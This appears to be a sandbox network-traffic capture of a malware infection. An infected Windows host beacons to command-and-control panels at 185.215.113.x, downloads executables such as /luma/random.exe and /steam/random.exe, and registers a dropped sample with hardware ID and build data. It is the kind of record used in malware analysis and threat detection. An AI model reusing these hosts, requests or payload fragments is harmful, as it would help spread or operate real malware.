Nov 10, 2024 04:56:13.792783976 CET	719	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:56:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 32 31 30 0d 0a 20 2b 2b 2b 5f 31 5f 39 64 33 66 64 38 30 32 31 38 32 64 63 31 35 61 33 34 61 31 39 37 62 36 66 63 64 34 36 61 62 39 38 65 36 30 30 63 62 64 61 65 36 64 33 64 35 33 39 34 39 38 66 31 30 32 35 61 62 38 37 61 65 37 30 32 37 31 30 30 39 32 31 66 65 37 61 36 36 61 64 66 35 66 2d 31 2d 5f 32 5f 63 66 32 34 64 31 34 61 32 65 37 32 38 66 36 39 36 36 66 62 63 34 66 64 62 61 63 36 33 65 38 38 64 38 33 39 35 39 66 62 66 65 36 30 34 64 30 64 64 38 39 32 66 31 33 33 35 63 65 63 32 64 39 33 35 33 32 33 35 33 63 39 35 38 62 32 64 30 36 36 64 38 32 63 2d 32 2d 5f 33 5f 62 33 33 38 62 30 30 30 31 62 31 36 63 39 31 61 36 64 61 32 61 35 66 66 64 36 65 39 34 35 39 39 39 65 33 35 30 32 61 64 61 62 36 32 37 64 30 30 38 62 64 39 38 31 33 34 30 36 62 33 37 35 65 36 32 66 33 34 2d 33 2d 5f 34 5f 62 62 31 65 38 33 30 39 30 64 32 37 64 32 31 66 37 36 61 34 39 63 38 30 64 64 63 35 35 65 38 61 61 31 30 61 30 66 38 32 63 64 32 32 35 32 30 30 39 64 63 31 61 36 33 62 31 37 39 37 35 61 62 36 30 39 32 34 2d 34 2d 5f [TRUNCATED] Data Ascii: 210 +++_1_9d3fd802182dc15a34a197b6fcd46ab98e600cbdae6d3d539498f1025ab87ae7027100921fe7a66adf5f-1-_2_cf24d14a2e728f6966fbc4fdbac63e88d83959fbfe604d0dd892f1335cec2d93532353c958b2d066d82c-2-_3_b338b0001b16c91a6da2a5ffd6e945999e3502adab627d008bd9813406b375e62f34-3-_4_bb1e83090d27d21f76a49c80ddc55e8aa10a0f82cd2252009dc1a63b17975ab60924-4-_5_cb6e9311310c8e4379abc0a5c8f445fa85202ea2cd644c67acdd8c1d29802fad530917bf35e9df7fbb222d5a864a590c4cb89946377e3495e61b5cee99c1e7e2f3acbb7efa33ae2709267151cf0cd6291f8143482349f9acf21b3d784e272d-5-0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	50127	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:56:13.981930017 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 35 32 30 34 30 31 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1005204011&unit=246122658369
Nov 10, 2024 04:56:14.893199921 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:56:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	50128	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:56:14.903016090 CET	55	OUT	GET /luma/random.exe HTTP/1.1 Host: 185.215.113.16
Nov 10, 2024 04:56:15.824580908 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:56:15 GMT Content-Type: application/octet-stream Content-Length: 3205120 Last-Modified: Sun, 10 Nov 2024 03:45:20 GMT Connection: keep-alive ETag: "67302c50-30e800" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 53 d3 15 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 4a 04 00 00 d6 00 00 00 00 00 00 00 f0 30 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 31 00 00 04 00 00 5d f0 30 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 a0 05 00 68 00 00 00 00 90 05 00 40 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 a1 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PELSgJ0@ 1]0@Th@ @.rsrc@@.idata @nrokrzch0+,+@ycjzqqvu00@.taggant00"0@
Nov 10, 2024 04:56:15.824596882 CET	112	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 10, 2024 04:56:15.824683905 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 10, 2024 04:56:15.824695110 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 10, 2024 04:56:15.824719906 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 10, 2024 04:56:15.824733019 CET	1236	IN	Data Raw: 87 60 ae df 9f 6c e1 2f 25 a9 4f 6a ab 13 ee a1 5c 1c af 16 d4 6c b2 d9 a2 5d 2b 1d c1 e2 57 85 e0 5d 21 63 c0 65 4b 2d 21 bb 2e 1e 9c e8 6f 42 c0 e8 33 a1 5c 61 b4 62 c0 81 f2 62 c0 6d 2b 1e 9c 5d ab 18 12 6c af 09 a9 5d 2b a3 65 e8 5f 42 ab e6 Data Ascii: `l/%Oj\l]+W]!ceK-!.oB3\abbm+]l]+e_B]"%O'O&']]+l?B.?~]0o'OBy]$]+-]wB+]+IHC;{73g/[]+`yeje]b3WbOVY
Nov 10, 2024 04:56:15.824744940 CET	848	IN	Data Raw: bc d1 2f a7 8f 8e 21 a8 75 66 1c 94 cf 16 2d 1e 9c 5d ae 5a c0 5f a8 46 29 e1 4f 79 9e 5d 2b a7 e0 81 43 a9 e0 81 37 df 7c 71 50 1e 9c 5d 3a 1f 64 e6 6f 42 a8 e6 77 42 bc 8e 21 08 78 67 2b 1e 29 e9 4f 79 9e 5d 2b a7 e8 81 43 ab 20 81 87 20 9c 5d Data Ascii: /!uf-]Z_F)Oy]+C7\|qP]:doBwB!xg+)Oy]+C ]-,BSpB;'OBa\;- +BoBoB+\bio@#'O"Pb}/S-RiD;zv%>&O!LBH:,,,On\ju.;\+*O
Nov 10, 2024 04:56:15.824769020 CET	1236	IN	Data Raw: 02 24 70 1f 9d 8d a3 9e 66 5f b3 72 c0 95 b4 0f 5e 46 48 a9 e0 81 2f 2d 52 69 33 a6 28 81 c7 1e 9c 5d b6 72 c0 69 b0 f0 ab e1 c3 1e 9c 5d 3a d4 a9 5d bb 62 9c e5 b7 42 39 5d 2b 1e 29 e1 4f bc 9c 5d 2b a7 e0 81 3f a7 6d e0 25 2c 0e 62 e4 2b 9c 5d Data Ascii: $pf_r^FH/-Ri3(]ri]:]bB9]+)O]+?m%,b+]+l;$pB]+\|`:j]+%O6%7]%aO,,,,uwBl"l::]+'aO~anWt ],'O66'O*+oB!ba]+foBeb}jH
Nov 10, 2024 04:56:15.824810028 CET	1236	IN	Data Raw: ac 88 9f 42 a8 a3 b4 7a c0 91 f2 62 c0 69 2c 1e 9c 60 14 2b a7 5d 2b 57 5e d9 2d a7 5e 86 f5 a7 72 46 d7 21 9c 5d b4 6a c0 69 b6 72 c0 65 16 4d 25 b1 4f 2e 25 b9 4f 42 27 b1 4f 26 87 79 b4 6a c0 69 b6 72 c0 65 b6 52 c0 48 3f a7 e8 81 3b a7 f8 81 Data Ascii: Bzbi,`+]+W^-^rF!]jireM%O.%OB'O&yjireRH?;O3bire"^+]:^bC_+/,BwB$}R1;l]\|gE]rm%,bT%0,,$pB]+OeoB^/3^%O*,,,
Nov 10, 2024 04:56:15.824821949 CET	1236	IN	Data Raw: 2c a1 2b a6 20 81 c8 1e 9c 5d b8 b2 c0 fb 2b 1e 9c 54 0a aa e0 81 3b a7 5d 96 1b 9b 9e e6 1c a4 65 e6 f9 2d 20 f1 2d 1e 9c e6 fc a1 7d 60 3a a2 25 5f 2b 1e 29 b7 2c e4 9e 8d b4 0f e6 6c af de 9e 5d 2b a7 74 e0 0e 22 ab e1 e2 20 9c 5d b8 78 9e 23 Data Ascii: ,+ ]+T;]e- -}`:%_+),l]+t" ]x#n][;?_+%5l]+`` ). -`:_+b.N0YG]+OnB8]+,,,,?-Ra;d$`mYK-,oBl\|]_]F2-Rb,]_$cqawB
Nov 10, 2024 04:56:15.829777956 CET	1236	IN	Data Raw: 8d e0 29 23 0e 7b b6 31 25 2d 23 ef 1d 1f 2b 1d 9b 5b 4d e0 29 a0 2f ab 0d 59 23 e1 1c dd ab 9e 10 38 17 23 21 26 a0 38 27 61 4f 21 e0 81 2f 4f 6e dd 67 31 9c d1 34 60 d5 2e a1 13 26 20 17 21 9d 30 b7 6a c0 75 ae 62 c0 81 2f 47 67 e6 87 42 bc 23 Data Ascii: )#{1%-#+[M)/Y#8#!&8'aO!/Ong14`.& !0jub/GgB#pB]b+_]+7]+O^+'O.'O"fra m/\V3^Ema9,+f]~S/`*ra)O]+G]#]+!!S2%;]b-dra'cO.]+%O

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	50133	185.215.113.209	80	5484	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:56:19.830307007 CET	157	OUT	POST /Fru7Nk9/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.209 Content-Length: 5 Cache-Control: no-cache Data Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
Nov 10, 2024 04:56:20.732604027 CET	719	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:56:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 32 31 30 0d 0a 20 2b 2b 2b 5f 31 5f 39 64 33 66 64 38 30 32 31 38 32 64 63 31 35 61 33 34 61 31 39 37 62 36 66 63 64 34 36 61 62 39 38 65 36 30 30 63 62 64 61 65 36 64 33 64 35 33 39 34 39 38 66 31 30 32 35 61 62 38 37 61 65 37 30 32 37 31 30 30 39 32 31 66 65 37 61 36 36 61 64 66 35 66 2d 31 2d 5f 32 5f 63 66 32 34 64 31 34 61 32 65 37 32 38 66 36 39 36 36 66 62 63 34 66 64 62 61 63 36 33 65 38 38 64 38 33 39 35 39 66 62 66 65 36 30 34 64 30 64 64 38 39 32 66 31 33 33 35 63 65 63 32 64 39 33 35 33 32 33 35 33 63 39 35 38 62 32 64 30 36 36 64 38 32 63 2d 32 2d 5f 33 5f 62 33 33 38 62 30 30 30 31 62 31 36 63 39 31 61 36 64 61 32 61 35 66 66 64 36 65 39 34 35 39 39 39 65 33 35 30 32 61 64 61 62 36 32 37 64 30 30 38 62 64 39 38 31 33 34 30 36 62 33 37 35 65 36 32 66 33 34 2d 33 2d 5f 34 5f 62 62 31 65 38 33 30 39 30 64 32 37 64 32 31 66 37 36 61 34 39 63 38 30 64 64 63 35 35 65 38 61 61 31 30 61 30 66 38 32 63 64 32 32 35 32 30 30 39 64 63 31 61 36 33 62 31 37 39 37 35 61 62 36 30 39 32 34 2d 34 2d 5f [TRUNCATED] Data Ascii: 210 +++_1_9d3fd802182dc15a34a197b6fcd46ab98e600cbdae6d3d539498f1025ab87ae7027100921fe7a66adf5f-1-_2_cf24d14a2e728f6966fbc4fdbac63e88d83959fbfe604d0dd892f1335cec2d93532353c958b2d066d82c-2-_3_b338b0001b16c91a6da2a5ffd6e945999e3502adab627d008bd9813406b375e62f34-3-_4_bb1e83090d27d21f76a49c80ddc55e8aa10a0f82cd2252009dc1a63b17975ab60924-4-_5_cb6e9311310c8e4379abc0a5c8f445fa85202ea2cd644c67acdd8c1d29802fad530917bf35e9df7fbb222d5a864a590c4cb89946377e3495e61b5cee99c1e7e2f3acbb7efa33ae2709267151cf0cd6291f8143482349f9acf21b3d784e272d-5-0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	50134	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:56:20.253118038 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 35 32 31 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1005217001&unit=246122658369
Nov 10, 2024 04:56:21.154911041 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:56:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	50136	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:56:21.164712906 CET	56	OUT	GET /steam/random.exe HTTP/1.1 Host: 185.215.113.16
Nov 10, 2024 04:56:22.086651087 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:56:21 GMT Content-Type: application/octet-stream Content-Length: 1769472 Last-Modified: Sun, 10 Nov 2024 03:45:33 GMT Connection: keep-alive ETag: "67302c5d-1b0000" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ce ac e2 38 8a cd 8c 6b 8a cd 8c 6b 8a cd 8c 6b e5 bb 27 6b 92 cd 8c 6b e5 bb 12 6b 87 cd 8c 6b e5 bb 26 6b b0 cd 8c 6b 83 b5 0f 6b 89 cd 8c 6b 83 b5 1f 6b 88 cd 8c 6b 0a b4 8d 6a 89 cd 8c 6b 8a cd 8d 6b d1 cd 8c 6b e5 bb 23 6b 98 cd 8c 6b e5 bb 11 6b 8b cd 8c 6b 52 69 63 68 8a cd 8c 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4f c3 2f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 40 22 00 00 00 00 00 00 10 68 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 40 68 00 00 04 00 00 6d 38 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$8kkk'kkkk&kkkkkkjkkk#kkkkRichkPELO/g@"h@@hm8@M$a$ $b@.rsrc $r@.idata $r@ )$t@vzzebkzrpNbv@ojovyeswh@.taggant0h"@
Nov 10, 2024 04:56:22.086699009 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 10, 2024 04:56:22.086709023 CET	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 10, 2024 04:56:22.086796045 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 10, 2024 04:56:22.086827040 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 10, 2024 04:56:22.086899042 CET	424	IN	Data Raw: ee b7 27 fa 48 bf e1 f3 f0 9e 7d 71 40 79 96 e6 fc 27 34 cf 60 9d 53 27 69 87 5f f0 67 97 bd cc 78 8f ec d7 70 87 74 d4 f6 8f e8 25 19 37 28 2c 60 85 12 0b 79 4b 7b 56 89 43 db 35 90 54 54 04 31 9b 43 a3 2e 1e 5c 23 90 92 4e d3 06 cb 41 ee 95 99 Data Ascii: 'H}q@y'4`S'i_gxpt%7(,`yK{VC5TT1C.\#NAwDb_\|3B_]`4Na xm0d?#8\[sn?C7wlIdG K.>%J4-(2Pu']0\r*wh#{Zd%,yj@])
Nov 10, 2024 04:56:22.086930990 CET	1236	IN	Data Raw: 07 68 e1 cf ee 0f 80 b8 91 66 51 2c b8 8f f3 de 7e d0 96 24 72 d1 87 d9 ea 90 13 ab 78 53 59 84 44 b5 7e 59 69 ee a0 a6 1f f7 93 e3 58 e7 39 29 1d 82 e0 e9 b4 69 69 bd f8 92 77 40 fb 9c a9 14 5b 17 96 29 1f eb 9d ba ef 13 94 d7 10 13 a8 57 72 0c Data Ascii: hfQ,~$rxSYD~YiX9)iiw@[)WrH9:&-p_>mcK>8JW9Q+c)-LM_mLP8L6p{Im-Q18UDDIs%89/:%qASgz9-J\|5+T$Km.H`c?7-Wl['
Nov 10, 2024 04:56:22.086985111 CET	1236	IN	Data Raw: cb e4 f0 7c 72 6a 31 d4 c0 c2 56 4b 62 86 d1 c2 1a 15 68 5a 70 97 0b 52 ee c7 37 0d 48 87 96 ea d8 e2 51 a5 71 b7 9f e8 05 9a 8b 0c 01 e8 38 99 a7 ae 69 c1 20 21 1c c6 70 cb 97 9d 51 bf d9 94 5f 73 fa ec 77 9e 7d fd 0f 60 51 23 49 d2 9b a7 1e d6 Data Ascii: \|rj1VKbhZpR7HQq8i !pQ_sw}`Q#Ibl,L\Orxd/ '% 9w}3%hd7B+r?AHG9%dZhDM/50`PF(<yx-\J'y`kb\,gr0G&RN<q`lPc
Nov 10, 2024 04:56:22.086994886 CET	424	IN	Data Raw: 5f 13 57 c8 6a d7 53 a5 a3 97 97 ca 70 98 df f6 a0 87 4c cd 2f 0e f7 a7 5e bc 97 da f8 0a 5a d3 30 40 34 35 5e 61 13 cf 38 cb 4f 39 05 0f a0 da 60 9d 6b c4 5e 47 98 c3 8b 98 94 a8 40 95 3a f9 70 8f b1 ac 9d 11 32 d5 38 95 60 fa 50 63 63 c6 c7 98 Data Ascii: _WjSpL/^Z0@45^a8O9`k^G@:p28`PccBUxq+eWW,dp7b+M_c@^LH`r)3&Iy"KwUY)mI.&c+xm%p[%\|h/AD{-::p-Q4`?rP(%
Nov 10, 2024 04:56:22.087011099 CET	1236	IN	Data Raw: 0c 7d 39 a1 32 9d 94 62 08 98 2b a9 04 1f 94 e2 83 c4 57 44 62 f3 2b 01 eb 07 0d d6 de b1 77 da 64 89 25 e1 19 88 02 d6 0e b1 59 da 48 95 93 f8 eb 42 98 64 04 2f 58 30 63 23 b2 2a cc 0f 26 25 62 08 28 67 64 f7 39 56 49 f0 ab d9 6f 80 42 19 ec 91 Data Ascii: }92b+WDb+wd%YHBd/X0c#*&%b(gd9VIoBAX8^B{1_V2s$Y0kB:xeb);_xOC]6'/c6o&rs8bdATGDpc]/}tpa,1BBq-d`
Nov 10, 2024 04:56:22.092794895 CET	1236	IN	Data Raw: 25 03 33 25 5f 47 58 58 62 4b 2b 37 69 a5 49 b8 89 91 03 2b bf c5 25 11 38 77 25 fd 04 61 8f a2 43 df 32 a6 ba dd 59 db 38 93 ef d2 4f 06 57 2c 21 07 7c f7 ec 89 25 8c 43 cd 4b a4 18 c3 27 db 19 69 da a7 00 95 3a b9 70 47 94 ac 43 11 fc 16 52 03 Data Ascii: %3%_GXXbK+7iI+%8w%aC2Y8OW,!\|%CK'i:pGCR0B3e^dB Z_YmgB+ /n$RS$9yr5i}lq'oO(%IbK+ta\C-0LGH07id^nv'sv"&-4s`ptmg

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	50143	185.215.113.209	80	8924	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:56:28.025083065 CET	157	OUT	POST /Fru7Nk9/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.209 Content-Length: 5 Cache-Control: no-cache Data Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
Nov 10, 2024 04:56:28.910048962 CET	719	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:56:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 32 31 30 0d 0a 20 2b 2b 2b 5f 31 5f 39 64 33 66 64 38 30 32 31 38 32 64 63 31 35 61 33 34 61 31 39 37 62 36 66 63 64 34 36 61 62 39 38 65 36 30 30 63 62 64 61 65 36 64 33 64 35 33 39 34 39 38 66 31 30 32 35 61 62 38 37 61 65 37 30 32 37 31 30 30 39 32 31 66 65 37 61 36 36 61 64 66 35 66 2d 31 2d 5f 32 5f 63 66 32 34 64 31 34 61 32 65 37 32 38 66 36 39 36 36 66 62 63 34 66 64 62 61 63 36 33 65 38 38 64 38 33 39 35 39 66 62 66 65 36 30 34 64 30 64 64 38 39 32 66 31 33 33 35 63 65 63 32 64 39 33 35 33 32 33 35 33 63 39 35 38 62 32 64 30 36 36 64 38 32 63 2d 32 2d 5f 33 5f 62 33 33 38 62 30 30 30 31 62 31 36 63 39 31 61 36 64 61 32 61 35 66 66 64 36 65 39 34 35 39 39 39 65 33 35 30 32 61 64 61 62 36 32 37 64 30 30 38 62 64 39 38 31 33 34 30 36 62 33 37 35 65 36 32 66 33 34 2d 33 2d 5f 34 5f 62 62 31 65 38 33 30 39 30 64 32 37 64 32 31 66 37 36 61 34 39 63 38 30 64 64 63 35 35 65 38 61 61 31 30 61 30 66 38 32 63 64 32 32 35 32 30 30 39 64 63 31 61 36 33 62 31 37 39 37 35 61 62 36 30 39 32 34 2d 34 2d 5f [TRUNCATED] Data Ascii: 210 +++_1_9d3fd802182dc15a34a197b6fcd46ab98e600cbdae6d3d539498f1025ab87ae7027100921fe7a66adf5f-1-_2_cf24d14a2e728f6966fbc4fdbac63e88d83959fbfe604d0dd892f1335cec2d93532353c958b2d066d82c-2-_3_b338b0001b16c91a6da2a5ffd6e945999e3502adab627d008bd9813406b375e62f34-3-_4_bb1e83090d27d21f76a49c80ddc55e8aa10a0f82cd2252009dc1a63b17975ab60924-4-_5_cb6e9311310c8e4379abc0a5c8f445fa85202ea2cd644c67acdd8c1d29802fad530917bf35e9df7fbb222d5a864a590c4cb89946377e3495e61b5cee99c1e7e2f3acbb7efa33ae2709267151cf0cd6291f8143482349f9acf21b3d784e272d-5-0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	50150	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:56:35.108118057 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 35 32 31 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1005218001&unit=246122658369
Nov 10, 2024 04:56:35.969528913 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:56:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	50151	185.215.113.206	80	3872	C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:56:35.500149965 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Nov 10, 2024 04:56:36.390600920 CET	203	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:56:36 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 10, 2024 04:56:36.402271032 CET	413	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DHCAECGIEBKJKEBGDHDA Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 48 43 41 45 43 47 49 45 42 4b 4a 4b 45 42 47 44 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 36 32 36 31 30 37 38 41 37 44 37 32 32 38 34 35 38 32 31 32 37 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 41 45 43 47 49 45 42 4b 4a 4b 45 42 47 44 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 41 45 43 47 49 45 42 4b 4a 4b 45 42 47 44 48 44 41 2d 2d 0d 0a Data Ascii: ------DHCAECGIEBKJKEBGDHDAContent-Disposition: form-data; name="hwid"B6261078A7D72284582127------DHCAECGIEBKJKEBGDHDAContent-Disposition: form-data; name="build"mars------DHCAECGIEBKJKEBGDHDA--
